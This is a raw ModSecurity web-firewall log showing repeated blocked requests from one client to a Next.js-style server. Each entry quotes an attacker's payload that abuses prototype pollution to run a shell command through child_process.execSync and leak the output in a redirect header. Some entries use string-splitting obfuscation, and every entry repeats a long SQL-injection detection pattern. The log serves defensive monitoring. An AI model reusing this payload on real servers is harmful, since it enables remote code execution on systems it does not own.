"/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _szhk=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _yoaf=Buffer.from(_szhk).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_yoaf};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/api/"] [unique_id "aY16WY_MCZZFujL22Y6oFwAAANg"] [Thu Feb 12 08:59:37.414670 2026] [:error] [pid 13989:tid 13992] [client 195.178.110.195:51190] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _esji=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _rtwc=Buffer.from(_esji).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_rtwc};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "aY16WY_MCZZFujL22Y6oGAAAAME"] [Thu Feb 12 08:59:37.458006 2026] [:error] [pid 13989:tid 14010] [client 195.178.110.195:51190] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _jgsv=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _srzi=Buffer.from(_jgsv).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_srzi};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aY16WY_MCZZFujL22Y6oGQAAANM"] [Thu Feb 12 08:59:37.502822 2026] [:error] [pid 13989:tid 14013] [client 195.178.110.195:51190] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _kprz=process['main' 'Module']['req' 'uire']('chi' 'ld_pro' 'cess')['exec' 'Sync'](Buffer.from('aWQ=','base64').toString()).toString().trim();var _xbqn=Buffer.from(_kprz).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_xbqn};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aY16WY_MCZZFujL22Y6oGgAAANY"] [Thu Feb 12 08:59:37.545380 2026] [:error] [pid 13989:tid 13995] [client 195.178.110.195:51190] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _dnaj=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _orto=Buffer.from(_dnaj).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_orto};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/en/"] [unique_id "aY16WY_MCZZFujL22Y6oGwAAAMQ"] [Thu Feb 12 08:59:37.588602 2026] [:error] [pid 13989:tid 13997] [client 195.178.110.195:51190] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _gecd=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _ymme=Buffer.from(_gecd).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_ymme};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/app/"] [unique_id "aY16WY_MCZZFujL22Y6oHAAAAMY"] [Thu Feb 12 08:59:37.631108 2026] [:error] [pid 13989:tid 14011] [client 195.178.110.195:51190] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _wzio=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _hvyu=Buffer.from(_wzio).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_hvyu};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/api/"] [unique_id "aY16WY_MCZZFujL22Y6oHQAAANQ"] [Thu Feb 12 08:59:37.674227 2026] [:error] [pid 13989:tid 13996] [client 195.178.110.195:51190] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _jaab=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _vfvv=Buffer.from(_jaab).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_vfvv};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "aY16WY_MCZZFujL22Y6oHgAAAMU"] [Thu Feb 12 08:59:37.718051 2026] [:error] [pid 13989:tid 14012] [client 195.178.110.195:51190] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _bfng=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _xpgg=Buffer.from(_bfng).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_xpgg};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aY16WY_MCZZFujL22Y6oHwAAANU"] [Thu Feb 12 08:59:37.761736 2026] [:error] [pid 13989:tid 13999] [client 195.178.110.195:51190] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _lupz=process['main' 'Module']['req' 'uire']('chi' 'ld_pro' 'cess')['exec' 'Sync'](Buffer.from('aWQ=','base64').toString()).toString().trim();var _cmvz=Buffer.from(_lupz).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_cmvz};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aY16WY_MCZZFujL22Y6oIAAAAMg"] [Thu Feb 12 08:59:37.805275 2026] [:error] [pid 13989:tid 14008] [client 195.178.110.195:51190] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _bhql=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _hido=Buffer.from(_bhql).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_hido};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/en/"] [unique_id "aY16WY_MCZZFujL22Y6oIQAAANE"] [Thu Feb 12 08:59:37.847849 2026] [:error] [pid 13989:tid 14001] [client 195.178.110.195:51190] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _vnfo=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _zuie=Buffer.from(_vnfo).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_zuie};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/app/"] [unique_id "aY16WY_MCZZFujL22Y6oIgAAAMo"] [Thu Feb 12 08:59:37.890608 2026] [:error] [pid 13989:tid 13993] [client 195.178.110.195:51190] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _ljon=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _ybmi=Buffer.from(_ljon).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_ybmi};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/api/"] [unique_id "aY16WY_MCZZFujL22Y6oIwAAAMI"] [Thu Feb 12 08:59:37.933789 2026] [:error] [pid 13989:tid 14000] [client 195.178.110.195:51190] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _eliq=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _hcyj=Buffer.from(_eliq).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_hcyj};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "aY16WY_MCZZFujL22Y6oJAAAAMk"] [Thu Feb 12 08:59:37.976232 2026] [:error] [pid 13989:tid 14009] [client 195.178.110.195:51190] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _zflj=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _ixrm=Buffer.from(_zflj).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_ixrm};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aY16WY_MCZZFujL22Y6oJQAAANI"] [Thu Feb 12 08:59:38.019194 2026] [:error] [pid 13989:tid 14014] [client 195.178.110.195:51190] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _uzel=process['main' 'Module']['req' 'uire']('chi' 'ld_pro' 'cess')['exec' 'Sync'](Buffer.from('aWQ=','base64').toString()).toString().trim();var _wkzc=Buffer.from(_uzel).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_wkzc};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aY16WY_MCZZFujL22Y6oJgAAANc"] [Thu Feb 12 08:59:38.069956 2026] [:error] [pid 13989:tid 13994] [client 195.178.110.195:51190] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _uvqh=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _dlrf=Buffer.from(_uvqh).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_dlrf};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/en/"] [unique_id "aY16Wo_MCZZFujL22Y6oJwAAAMM"] [Thu Feb 12 08:59:38.113365 2026] [:error] [pid 13989:tid 14004] [client 195.178.110.195:51190] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _fjxx=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _ggez=Buffer.from(_fjxx).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_ggez};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/app/"] [unique_id "aY16Wo_MCZZFujL22Y6oKAAAAM0"] [Thu Feb 12 08:59:38.156563 2026] [:error] [pid 13989:tid 14002] [client 195.178.110.195:51190] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _whog=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _qxvk=Buffer.from(_whog).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_qxvk};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/api/"] [unique_id "aY16Wo_MCZZFujL22Y6oKQAAAMs"] [Thu Feb 12 08:59:38.199560 2026] [:error] [pid 13989:tid 14003] [client 195.178.110.195:51190] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _icel=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _hiyj=Buffer.from(_icel).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_hiyj};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "aY16Wo_MCZZFujL22Y6oKgAAAMw"] [Thu Feb 12 08:59:38.242451 2026] [:error] [pid 13989:tid 14006] [client 195.178.110.195:51190] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match 